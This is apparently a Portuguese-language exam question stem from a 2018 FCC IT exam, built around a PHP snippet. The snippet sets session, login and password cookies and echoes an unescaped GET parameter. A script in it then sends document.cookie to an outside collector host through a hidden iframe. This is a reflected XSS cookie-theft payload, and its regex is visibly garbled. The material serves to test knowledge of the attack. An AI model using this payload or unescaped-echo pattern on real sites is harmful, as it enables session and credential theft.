Considere o trecho de programa PHP abaixo.
<?php
setcookie('PHPSSESID', 'meusid');
setcookie('login', 'meulogin');
setcookie('senha', 'minhasenha');
echo $GET['var'];
?>
<script>
document.write('<iframe width=1 height=1
src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')
</script>
Fonte: TéCNICO JUDICIáRIO - TECNOLOGIA DA INFORMAçãO / TRT 2ª / 2018 / FCC